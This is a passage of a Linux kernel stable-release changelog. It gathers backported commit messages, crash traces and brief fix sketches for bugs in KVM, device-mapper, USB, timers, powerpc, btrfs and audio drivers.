Signed-off-by: James Hogan <james.hogan@imgtec.com>
Cc: Paolo Bonzini <pbonzini@redhat.com>
Cc: "Radim Krčmář" <rkrcmar@redhat.com>
Cc: Ralf Baechle <ralf@linux-mips.org>
Cc: linux-mips@linux-mips.org
Cc: kvm@vger.kernel.org
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bd768e1466 upstream.
vcpu->arch.wbinvd_dirty_mask may still be used after freeing it,
corrupting memory. For example, the following call trace may set a bit
in an already freed cpu mask:
kvm_arch_vcpu_load
vcpu_load
vmx_free_vcpu_nested
vmx_free_vcpu
kvm_arch_vcpu_free
Fix this by deferring freeing of wbinvd_dirty_mask.
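A minimal sketch of the deferred-free pattern (not the literal patch):
	void kvm_arch_vcpu_free(struct kvm_vcpu *vcpu)
	{
		/* keep a local copy so the mask outlives the vendor teardown */
		void *wbinvd_dirty_mask = vcpu->arch.wbinvd_dirty_mask;

		kvm_x86_ops->vcpu_free(vcpu);	/* may vcpu_load() and set bits */
		free_cpumask_var(wbinvd_dirty_mask);	/* only now is it safe */
	}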
Signed-off-by: Ido Yariv <ido@wizery.com>
Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Radim Krčmář <rkrcmar@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d09960b003 upstream.
dm_old_request_fn() has paths that access md->io_barrier. The party
destroying io_barrier should ensure that no future execution of
dm_old_request_fn() is possible. Move io_barrier destruction to below
blk_cleanup_queue() to ensure this and avoid a NULL pointer crash during
request-based DM device shutdown.
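A minimal sketch of the ordering, assuming io_barrier is the SRCU structure
torn down with cleanup_srcu_struct():
	/* in the device teardown path */
	blk_cleanup_queue(md->queue);		/* no further dm_old_request_fn() */
	cleanup_srcu_struct(&md->io_barrier);	/* now safe to destroy */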
Signed-off-by: Tahsin Erdogan <tahsin@google.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1d4f1d53e1 upstream.
Commit 2518ac59eb ("staging: wilc1000: Replace kthread with workqueue
for host interface") adds an unconditional destroy_workqueue() on the
wilc's "hif_workqueue" soon after its creation thereby rendering
it unusable. It then further attempts to queue work onto this
non-existing hif_worqueue and results in:
Unable to handle kernel NULL pointer dereference at virtual address 00000010
pgd = de478000
[00000010] *pgd=3eec0831, *pte=00000000, *ppte=00000000
Internal error: Oops: 17 [#1] ARM
Modules linked in: wilc1000_sdio(C) wilc1000(C)
CPU: 0 PID: 825 Comm: ifconfig Tainted: G C 4.8.0-rc8+ #37
Hardware name: Atmel SAMA5
task: df56f800 task.stack: deeb0000
PC is at __queue_work+0x90/0x284
LR is at __queue_work+0x58/0x284
pc : [<c0126bb0>] lr : [<c0126b78>] psr: 600f0093
sp : deeb1aa0 ip : def22d78 fp : deea6000
r10: 00000000 r9 : c0a08150 r8 : c0a2f058
r7 : 00000001 r6 : dee9b600 r5 : def22d74 r4 : 00000000
r3 : 00000000 r2 : def22d74 r1 : 07ffffff r0 : 00000000
Flags: nZCv IRQs off FIQs on Mode SVC_32 ISA ARM Segment none
...
[<c0127060>] (__queue_work) from [<c0127298>] (queue_work_on+0x34/0x40)
[<c0127298>] (queue_work_on) from [<bf0076b4>] (wilc_enqueue_cmd+0x54/0x64 [wilc1000])
[<bf0076b4>] (wilc_enqueue_cmd [wilc1000]) from [<bf0082b4>] (wilc_set_wfi_drv_handler+0x48/0x70 [wilc1000])
[<bf0082b4>] (wilc_set_wfi_drv_handler [wilc1000]) from [<bf00509c>] (wilc_mac_open+0x214/0x250 [wilc1000])
[<bf00509c>] (wilc_mac_open [wilc1000]) from [<c04fde98>] (__dev_open+0xb8/0x11c)
[<c04fde98>] (__dev_open) from [<c04fe128>] (__dev_change_flags+0x94/0x158)
[<c04fe128>] (__dev_change_flags) from [<c04fe204>] (dev_change_flags+0x18/0x48)
[<c04fe204>] (dev_change_flags) from [<c0557d5c>] (devinet_ioctl+0x6b4/0x788)
[<c0557d5c>] (devinet_ioctl) from [<c04e40a0>] (sock_ioctl+0x154/0x2cc)
[<c04e40a0>] (sock_ioctl) from [<c01b16e0>] (do_vfs_ioctl+0x9c/0x878)
[<c01b16e0>] (do_vfs_ioctl) from [<c01b1ef0>] (SyS_ioctl+0x34/0x5c)
[<c01b1ef0>] (SyS_ioctl) from [<c0107520>] (ret_fast_syscall+0x0/0x3c)
Code: e5932004 e1520006 01a04003 0affffff (e5943010)
---[ end trace b612328adaa6bf20 ]---
This fix removes the unnecessary call to destroy_workqueue() while opening
the device to avoid the above kernel panic. The deinit routine already
does a good job of terminating the workqueue when no longer needed.
Reported-by: Nicolas Ferre <Nicolas.Ferre@microchip.com>
Fixes: 2518ac59eb ("staging: wilc1000: Replace kthread with workqueue for host interface")
Signed-off-by: Aditya Shankar <Aditya.Shankar@microchip.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d1fe85ec77 upstream.
This will result in a random value being reported on big endian architectures.
(thanks to Lars-Peter Clausen for pointing out the effects of this bug)
Only affects a value printed to the log, but as this reports the settings of
the probe in question it may be of direct interest to users.
Also, fixes the following sparse endianness warnings:
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
Signed-off-by: Sandhya Bankar <bankarsandhya512@gmail.com>
Fixes: e8dd92bfbf ("iio: chemical: atlas-ph-sensor: add EC feature")
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 51227bf520 upstream.
I2C and SPI interfaces share common clock trees within the CP110 HW block.
It occurred that SPI0 interface has wrong clock assignment in the device
tree, which is fixed in this commit to a proper value.
Fixes: 728dacc7f4 ("arm64: dts: marvell: initial DT description of ...")
Signed-off-by: Marcin Wojtas <mw@semihalf.com>
Signed-off-by: Gregory CLEMENT <gregory.clement@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 346e99736c upstream.
If a device is unplugged and replugged during Sx system suspend
some Intel xHC hosts will overwrite the CAS (Cold attach status) flag
and no device connection is noticed in resume.
A device in this state can be identified in resume if its link state
is in polling or compliance mode, and the current connect status is 0.
A device in this state needs to be warm reset.
Intel 100/c230 series PCH specification update Doc #332692-006 Errata #8
Observed on Cherryview and Apollolake as they go into compliance mode
if LFPS times out during polling, and re-plugged devices are not
discovered at resume.
Signed-off-by: Mathias Nyman <mathias.nyman@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4c39135aa4 upstream.
The xHC in the Wildcatpoint-LP PCH is similar to LynxPoint-LP and needs the
same quirks to prevent machines from spuriously restarting while
shutting them down.
Reported-by: Hasan Mahmood <hasan.mahm@gmail.com>
Signed-off-by: Mathias Nyman <mathias.nyman@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 407a3aee6e upstream.
The host keeps sending heartbeat packets independent of the
guest responding to them. Even though we respond to the heartbeat messages at
interrupt level, we can have situations where there may be multiple heartbeat
messages pending that have not been responded to. For instance, this occurs when
the VM is paused and the host continues to send the heartbeat messages.
Address this issue by draining and responding to all
the heartbeat messages that may be pending.
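A minimal sketch of the drain loop; buf and buflen are hypothetical locals and
the payload handling is elided:
	u32 recvlen;
	u64 requestid;

	while (vmbus_recvpacket(channel, buf, buflen, &recvlen, &requestid) == 0 &&
	       recvlen > 0) {
		/* ... locate the heartbeat payload and bump its seq_num ... */
		vmbus_sendpacket(channel, buf, recvlen, requestid,
				 VM_PKT_DATA_INBAND, 0);
	}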
Signed-off-by: Long Li <longli@microsoft.com>
Signed-off-by: K. Y. Srinivasan <kys@microsoft.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1e90a13d0c upstream.
The recent changes which forced the registration of the boot cpu on UP
systems without ACPI tables have been fixed for systems w/o a
local APIC, but left a wreckage for systems which have neither ACPI nor
mptables but whose CPU has an APIC, e.g. virtualbox.
The boot process crashes in prefill_possible_map() as it wants to register
the boot cpu, which needs to access the local apic, but the local APIC is
not yet mapped.
There is no reason why init_apic_mapping() can't be invoked before
prefill_possible_map(). So instead of playing another silly early mapping
game, as the ACPI/mptables code does, we just move init_apic_mapping()
before the call to prefill_possible_map().
In hindsight, I should have noticed that combination earlier.
Sorry for the churn (also in stable)!
Fixes: ff8560512b ("x86/boot/smp: Don't try to poke disabled/non-existent APIC")
Reported-and-debugged-by: Michal Necasek <michal.necasek@oracle.com>
Reported-and-tested-by: Wolfgang Bauer <wbauer@tmo.at>
Cc: prarit@redhat.com
Cc: ville.syrjala@linux.intel.com
Cc: michael.thayer@oracle.com
Cc: knut.osmundsen@oracle.com
Cc: frank.mehnert@oracle.com
Cc: Borislav Petkov <bp@alien8.de>
Link: http://lkml.kernel.org/r/alpine.DEB.2.20.1610282114380.5053@nanos
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a7a7aeefbc upstream.
When interrupting an application which was allocating DMAable
memory, it was possible, that the DMA memory was deallocated
twice, leading to the error symptoms below.
Thanks to Gerald, who analyzed the problem and provided this
patch.
I agree with his analysis of the problem: ddcb_cmd_fixups() ->
genwqe_alloc_sync_sgl() (fails in f/lpage, but sgl->sgl != NULL
and f/lpage maybe also != NULL) -> ddcb_cmd_cleanup() ->
genwqe_free_sync_sgl() (double free, because sgl->sgl != NULL and
f/lpage maybe also != NULL)
In this scenario we would have exactly the kind of double free that
would explain the WARNING / Bad page state, and as expected it is
caused by broken error handling (cleanup).
Using the Ubuntu git source, tag Ubuntu-4.4.0-33.52, he was able to reproduce
the "Bad page state" issue, and with the patch on top he could not reproduce
it any more.
------------[ cut here ]------------
WARNING: at /build/linux-o03cxz/linux-4.4.0/arch/s390/include/asm/pci_dma.h:141
Modules linked in: qeth_l2 ghash_s390 prng aes_s390 des_s390 des_generic sha512_s390 sha256_s390 sha1_s390 sha_common genwqe_card qeth crc_itu_t qdio ccwgroup vmur dm_multipath dasd_eckd_mod dasd_mod
CPU: 2 PID: 3293 Comm: genwqe_gunzip Not tainted 4.4.0-33-generic #52-Ubuntu
task: 0000000032c7e270 ti: 00000000324e4000 task.ti: 00000000324e4000
Krnl PSW : 0404c00180000000 0000000000156346 (dma_update_cpu_trans+0x9e/0xa8)
R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:0 PM:0 EA:3
Krnl GPRS: 00000000324e7bcd 0000000000c3c34a 0000000027628298 000000003215b400
0000000000000400 0000000000001fff 0000000000000400 0000000116853000
07000000324e7b1e 0000000000000001 0000000000000001 0000000000000001
0000000000001000 0000000116854000 0000000000156402 00000000324e7a38
Krnl Code: 000000000015633a: 95001000 cli 0(%r1),0
000000000015633e: a774ffc3 brc 7,1562c4
#0000000000156342: a7f40001 brc 15,156344
>0000000000156346: 92011000 mvi 0(%r1),1
000000000015634a: a7f4ffbd brc 15,1562c4
000000000015634e: 0707 bcr 0,%r7
0000000000156350: c00400000000 brcl 0,156350
0000000000156356: eb7ff0500024 stmg %r7,%r15,80(%r15)
Call Trace:
([<00000000001563e0>] dma_update_trans+0x90/0x228)
[<00000000001565dc>] s390_dma_unmap_pages+0x64/0x160
[<00000000001567c2>] s390_dma_free+0x62/0x98
[<000003ff801310ce>] __genwqe_free_consistent+0x56/0x70 [genwqe_card]
[<000003ff801316d0>] genwqe_free_sync_sgl+0xf8/0x160 [genwqe_card]
[<000003ff8012bd6e>] ddcb_cmd_cleanup+0x86/0xa8 [genwqe_card]
[<000003ff8012c1c0>] do_execute_ddcb+0x110/0x348 [genwqe_card]
[<000003ff8012c914>] genwqe_ioctl+0x51c/0xc20 [genwqe_card]
[<000000000032513a>] do_vfs_ioctl+0x3b2/0x518
[<0000000000325344>] SyS_ioctl+0xa4/0xb8
[<00000000007b86c6>] system_call+0xd6/0x264
[<000003ff9e8e520a>] 0x3ff9e8e520a
Last Breaking-Event-Address:
[<0000000000156342>] dma_update_cpu_trans+0x9a/0xa8
---[ end trace 35996336235145c8 ]---
BUG: Bad page state in process jbd2/dasdb1-8 pfn:3215b
page:000003d100c856c0 count:-1 mapcount:0 mapping: (null) index:0x0
flags: 0x3fffc0000000000()
page dumped because: nonzero _count
Signed-off-by: Gerald Schaefer <gerald.schaefer@de.ibm.com>
Signed-off-by: Frank Haverkamp <haver@linux.vnet.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ed6d6f8f42 upstream.
Increase the OHCI watchdog delay to 275 ms. The previous delay was 250 ms
with 20 ms of slack; after removing the slack time, some OHCI controllers don't
respond in time. Logs from systems with affected controllers would show
"HcDoneHead not written back; disabled".
Signed-off-by: Bryan Paluch <bryanpaluch@gmail.com>
Acked-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b76032396d upstream.
Since the controller on R-Car Gen3 doesn't have any status registers
to detect initialization (LPSTS.SUSPM = 1) and the initialization needs
up to 45 usec, this patch adds a wait after the initialization. Otherwise,
writing other registers (e.g. INTENB0) will fail.
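A rough sketch of the pattern; the register/bit helper names (usbhs_bset,
LPSTS, LPSTS_SUSPM) are illustrative of this driver, not quoted from the patch:
	usbhs_bset(priv, LPSTS, LPSTS_SUSPM, LPSTS_SUSPM);	/* SUSPM = 1 */
	usleep_range(45, 90);	/* no status bit to poll; init needs <= 45 usec */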
Fixes: de18757e27 ("usb: renesas_usbhs: add R-Car Gen3 power control")
Cc: <balbi@kernel.org>
Signed-off-by: Yoshihiro Shimoda <yoshihiro.shimoda.uh@renesas.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7d3b016a6f upstream.
USB2 host-initiated resume and system suspend bus resume
need to use the same USB_RESUME_TIMEOUT as elsewhere.
This resolves a device disconnect issue at system resume seen
on Intel Braswell and Apollolake, but is in no way limited to
those platforms.
Signed-off-by: Mathias Nyman <mathias.nyman@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ca006f785f upstream.
This adds support to ftdi_sio for the Infineon TriBoard TC2X7
engineering board for first-generation Aurix SoCs with Tricore CPUs.
Mere addition of the device IDs does the job.
Signed-off-by: Stefan Tauner <stefan.tauner@technikum-wien.at>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit de24e0a108 upstream.
The current tiocmget implementation would fail to report errors up the
stack and instead leaked a few bits from the stack as a mask of
modem-status flags.
Fixes: 39a66b8d22 ("[PATCH] USB: CP2101 Add support for flow control")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 126d26f66d upstream.
Make sure we have at least one port before attempting to register a
console.
Currently, at least one driver binds to a "dummy" interface and requests
zero ports for it. Should such an interface also lack endpoints, we get
a NULL-deref during probe.
Fixes: e5b1e2062e ("USB: serial: make minor allocation dynamic")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6c83f77278 upstream.
If we don't guarantee that we will always get an
interrupt at least when we're queueing our very last
request, we could fall into a situation where we queue
every request with 'no_interrupt' set. This will
cause the link to get stuck.
The behavior above has been triggered with g_ether
and dwc3.
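A minimal sketch of the rule; is_last is a hypothetical flag meaning "this is
the final request being queued":
	bool ioc = !req->request.no_interrupt;

	if (is_last)
		ioc = true;	/* always interrupt on the very last request */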
Reported-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 43605e293e upstream.
SEC registers are not accessible when the TXE device is in low power
state, hence the SEC interrupt cannot be processed if device is not
awake.
In some rare cases, entry to the low power state (aliveness off) and the input
ready bit can be signaled at the same time, resulting in a communication
stall as input ready won't be signaled again after waking up. To resolve
this, the IPC_HHIER_SEC bit in HHISR_REG should not be cleared if the
interrupt is not processed.
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c83ed4c9db upstream.
If UBIFS is facing an error while walking a directory, it reports this
error and ubifs_readdir() returns the error code. But the VFS readdir
logic does not make the getdents system call fail in all cases. When the
readdir cursor indicates that more entries are present, the system call
will just return and the libc wrapper will try again since it also
knows that more entries are present.
This causes the libc wrapper to busy loop forever when a directory is
corrupted on UBIFS.
A common approach to deal with corrupted directory entries is
skipping them by setting the cursor to the next entry. On UBIFS this
approach is not possible since we cannot compute the next directory
entry cursor position without reading the current entry. So all we can
do is setting the cursor to the "no more entries" position and make
getdents exit.
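A minimal sketch of the error exit, close to but not literally the patch:
	out:
		if (err != -ENOENT)
			ubifs_err(c, "cannot find next direntry, error %d", err);
		else
			err = 0;	/* -ENOENT just means end of directory */

		ctx->pos = 2;		/* treated as "no more entries" */
		return err;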
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4da9152a43 upstream.
Linus stumbled over the unlocked modification of the timer expiry value in
mod_timer() which is an optimization for timers which stay in the same
bucket - due to the bucket granularity - despite their expiry time getting
updated.
The optimization itself still makes sense even if we take the lock, because
in case that the bucket stays the same, we avoid the pointless
queue/enqueue dance.
Make the check and the modification of timer->expires protected by the base
lock and shuffle the remaining code around so we can keep the lock held
when we actually have to requeue the timer to a different bucket.
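A minimal sketch of the locked fast path; calc_wheel_index()/timer_get_idx()
are the 4.8 timer-wheel helpers, used here approximately, and the out_unlock
label is illustrative:
	base = lock_timer_base(timer, &flags);

	if (timer_pending(timer) &&
	    calc_wheel_index(expires, base->clk) == timer_get_idx(timer)) {
		/* bucket unchanged: update expiry under the lock and bail out */
		timer->expires = expires;
		goto out_unlock;
	}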
Fixes: f00c0afdfa ("timers: Implement optimization for same expiry time in mod_timer()")
Reported-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Link: http://lkml.kernel.org/r/alpine.DEB.2.20.1610241711220.4983@nanos
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6bad6bccf2 upstream.
When a timer is enqueued we try to forward the timer base clock. This
mechanism has two issues:
1) Forwarding a remote base unlocked
The forwarding function is called from get_target_base() with the current
timer base lock held. But if the new target base is a different base than
the current base (can happen with NOHZ, sigh!) then the forwarding is done
on an unlocked base. This can lead to corruption of base->clk.
Solution is simple: Invoke the forwarding after the target base is locked.
2) Possible corruption due to jiffies advancing
This is similar to the issue in get_next_timer_interrupt() which was fixed
in the previous patch. jiffies can advance between the check and the assignment,
thereby advancing base->clk beyond the next expiry value.
So we need to read jiffies into a local variable once and do the checks and
assignment with the local copy.
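A minimal sketch of the pattern (not the exact kernel code):
	unsigned long jnow = READ_ONCE(jiffies);	/* one stable snapshot */

	if (time_after(jnow, base->clk)) {
		if (time_after(base->next_expiry, jnow))
			base->clk = jnow;
		else
			base->clk = base->next_expiry;
	}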
Fixes: a683f390b93f ("timers: Forward the wheel clock whenever possible")
Reported-by: Ashton Holmes <scoopta@gmail.com>
Reported-by: Michael Thayer <michael.thayer@oracle.com>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Cc: Michal Necasek <michal.necasek@oracle.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: knut.osmundsen@oracle.com
Cc: stern@rowland.harvard.edu
Cc: rt@linutronix.de
Link: http://lkml.kernel.org/r/20161022110552.253640125@linutronix.de
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 041ad7bc75 upstream.
Ashton and Michael reported, that kernel versions 4.8 and later suffer from
USB timeouts which are caused by the timer wheel rework.
This is caused by a bug in the base clock forwarding mechanism, which leads
to timers expiring early. The scenario which leads to this is:
run_timers()
	while (jiffies >= base->clk) {
		collect_expired_timers();
		base->clk++;
		expire_timers();
	}
So base->clk = jiffies + 1. Now the cpu goes idle:
idle()
	get_next_timer_interrupt()
		nextevt = __next_timer_interrupt();
		if (time_after(nextevt, base->clk))
			base->clk = jiffies;
jiffies has not advanced since run_timers(), so this assignment effectively
decrements base->clk by one.
base->clk is the index into the timer wheel arrays. So let's assume the
following state after the base->clk increment in run_timers():
jiffies = 0
base->clk = 1
A timer gets enqueued with an expiry delta of 63 ticks (which is the case
with the USB timeout and HZ=250) so the resulting bucket index is:
base->clk + delta = 1 + 63 = 64
The timer goes into the first wheel level. The array size is 64 so it ends
up in bucket 0, which is correct as it takes 63 ticks to advance base->clk
to index into bucket 0 again.
If the cpu goes idle before jiffies advance, then the bug in the forwarding
mechanism sets base->clk back to 0, so the next invocation of run_timers()
at the next tick will index into bucket 0 and therefore expire the timer 62
ticks too early.
Instead of blindly setting base->clk to jiffies we must make the forwarding
conditional on jiffies > base->clk, but we cannot use jiffies for this as
we might run into the following issue:
if (time_after(jiffies, base->clk)) {
	if (time_after(nextevt, base->clk))
		base->clk = jiffies;
jiffies can increment between the check and the assignment far enough to
advance beyond nextevt. So we need to use a stable value for checking.
get_next_timer_interrupt() has the basej argument, which is the jiffies
value snapshot taken in the calling code. So we can just use that.
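In sketch form (not the literal diff), the check becomes:
	if (time_after(nextevt, basej))
		base->clk = basej;	/* basej cannot move under us */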
Thanks to Ashton for bisecting and providing trace data!
Fixes: a683f390b9 ("timers: Forward the wheel clock whenever possible")
Reported-by: Ashton Holmes <scoopta@gmail.com>
Reported-by: Michael Thayer <michael.thayer@oracle.com>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Cc: Michal Necasek <michal.necasek@oracle.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: knut.osmundsen@oracle.com
Cc: stern@rowland.harvard.edu
Cc: rt@linutronix.de
Link: http://lkml.kernel.org/r/20161022110552.175308322@linutronix.de
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 09b7e37b18 upstream.
This fixes a race condition where one thread that is entering or
leaving a power-saving state can inadvertently ignore the lock bit
that was set by another thread, and potentially also clear it.
The core_idle_lock_held function is called when the lock bit is
seen to be set. It polls the lock bit until it is clear, then
does a lwarx to load the word containing the lock bit and thread
idle bits so it can be updated. However, it is possible that the
value loaded with the lwarx has the lock bit set, even though an
immediately preceding lwz loaded a value with the lock bit clear.
If this happens then we go ahead and update the word despite the
lock bit being set, and when called from pnv_enter_arch207_idle_mode,
we will subsequently clear the lock bit.
No identifiable misbehaviour has been attributed to this race.
This fixes it by checking the lock bit in the value loaded by the
lwarx. If it is set then we just go back and keep on polling.
Fixes: b32aadc1a8 ("powerpc/powernv: Fix race in updating core_idle_state")
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 56c46222af upstream.
Commit 8117ac6a6c ("powerpc/powernv: Switch off MMU before entering
nap/sleep/rvwinkle mode", 2014-12-10) fixed a race condition where one
thread entering a KVM guest could switch the MMU context to the guest
while another thread was still in host kernel context with the MMU on.
That commit moved the point where a thread entering a power-saving
mode set its kvm_hstate.hwthread_state field in its PACA to
KVM_HWTHREAD_IN_IDLE from a point where the MMU was on to after the
MMU had been switched off. That commit also added a comment
explaining that we have to switch to real mode before setting
hwthread_state to avoid this race.
Nevertheless, commit 4eae2c9ae5 ("powerpc/powernv: Make
pnv_powersave_common more generic", 2016-07-08) subsequently moved
the setting of hwthread_state back to a point where the MMU is on,
thus reintroducing the race, despite the comment saying that this
should not be done being included in full in the context lines of
the patch that did it.
This fixes the race again and adds a bigger and shoutier comment
explaining the potential race condition.
Fixes: 4eae2c9ae5 ("powerpc/powernv: Make pnv_powersave_common more generic")
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Reviewed-by: Shreyas B. Prabhu <shreyasbp@gmail.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bd77c44986 upstream.
Before this patch, we used tlbiel, if we ever ran only on this core.
That was mostly derived from the nohash usage of the same. But it is
incorrect; ISA 3.0 clarifies tlbiel such that:
"All TLB entries that have all of the following properties are made
invalid on the thread executing the tlbiel instruction"
ie. tlbiel only invalidates TLB entries on the current thread. So if the
mm has been used on any other thread (aka. cpu) then we must broadcast
the invalidate.
This bug could lead to invalid TLB entries if a program runs on multiple
threads of a core.
Hence only use tlbiel if we have only ever run on the current cpu.
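A minimal sketch of the resulting logic; the cpumask condition shown is an
illustration of "only ever ran on the current cpu", not the exact helper the
patch uses:
	if (cpumask_equal(mm_cpumask(mm), cpumask_of(smp_processor_id())))
		radix__local_flush_tlb_mm(mm);	/* tlbiel: this thread only */
	else
		radix__flush_tlb_mm(mm);	/* tlbie: broadcast invalidate */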
Fixes: 1a472c9dba ("powerpc/mm/radix: Add tlbflush routines")
Signed-off-by: Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 80f23935ca upstream.
PowerPC's "cmp" instruction has four operands. Normally people write
"cmpw" or "cmpd" for the second cmp operand 0 or 1. But, frequently
people forget, and write "cmp" with just three operands.
With older binutils this is silently accepted as if this was "cmpw",
while often "cmpd" is wanted. With newer binutils GAS will complain
about this for 64-bit code. For 32-bit code it still silently assumes
"cmpw" is what is meant.
In this instance the code comes directly from ISA v2.07, including the
cmp, but cmpd is correct. Backport to stable so that new toolchains can
build old kernels.
Fixes: 948cf67c47 ("powerpc: Add NAP mode support on Power7 in HV mode")
Reviewed-by: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
Signed-off-by: Segher Boessenkool <segher@kernel.crashing.org>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 570dd45042 upstream.
btrfs_remove_all_log_ctxs takes a shortcut where it avoids walking the
list because it knows all of the waiters are patiently waiting for the
commit to finish.
But, there's a small race where btrfs_sync_log can remove itself from
the list if it finds a log commit is already done. Also, it uses
list_del_init() to remove itself from the list, but there's no way to
know if btrfs_remove_all_log_ctxs has already run, so we don't know for
sure if it is safe to call list_del_init().
This gets rid of all the shortcuts for btrfs_remove_all_log_ctxs(), and
just calls it with the proper locking.
This is part two of the corruption fixed by cbd60aa7cd. I should have
done this in the first place, but convinced myself the optimizations were
safe. A 12 hour run of dbench 2048 will eventually trigger a list debug
WARN_ON for the list_del_init() in btrfs_sync_log().
Fixes: d1433debe7
Reported-by: Dave Jones <davej@codemonkey.org.uk>
Signed-off-by: Chris Mason <clm@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a05b82d514 upstream.
In some error paths in functions cxl_start_context and
afu_ioctl_start_work pid references to the current & group-leader tasks
can leak after they are taken. This patch fixes these error paths to
release these pid references before exiting the error path.
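A minimal sketch of such an error path (field names as used by cxl contexts;
rc is a hypothetical error code and this is not the literal patch):
	err:
		put_pid(ctx->glpid);	/* put_pid(NULL) is a no-op */
		put_pid(ctx->pid);
		ctx->glpid = ctx->pid = NULL;
		return rc;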
Fixes: 7b8ad495d5 ("cxl: Fix DSI misses when the context owning task exits")
Reviewed-by: Andrew Donnellan <andrew.donnellan@au1.ibm.com>
Reported-by: Frederic Barrat <fbarrat@linux.vnet.ibm.com>
Signed-off-by: Vaibhav Jain <vaibhav@linux.vnet.ibm.com>
Acked-by: Frederic Barrat <fbarrat@linux.vnet.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0a3ffab93f upstream.
Prevent using a binder_ref with only weak references where a strong
reference is required.
Signed-off-by: Arve Hjønnevåg <arve@android.com>
Signed-off-by: Martijn Coenen <maco@android.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6aecd87158 upstream.
They use the ALC255 codec and have pin cfg definitions different
from the ones in the existing pin quirk table. Now add them to
the table to fix the problem.
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1a3f099101 upstream.
ASRock B150M Pro4/D3 mobo with ALC892 codec doesn't seem to provide
proper pins for the surround outputs, hence we need to specify the
pincfgs manually with a couple of other corrections.
Reported-and-tested-by: Benjamin Valentin <benpicco@googlemail.com>
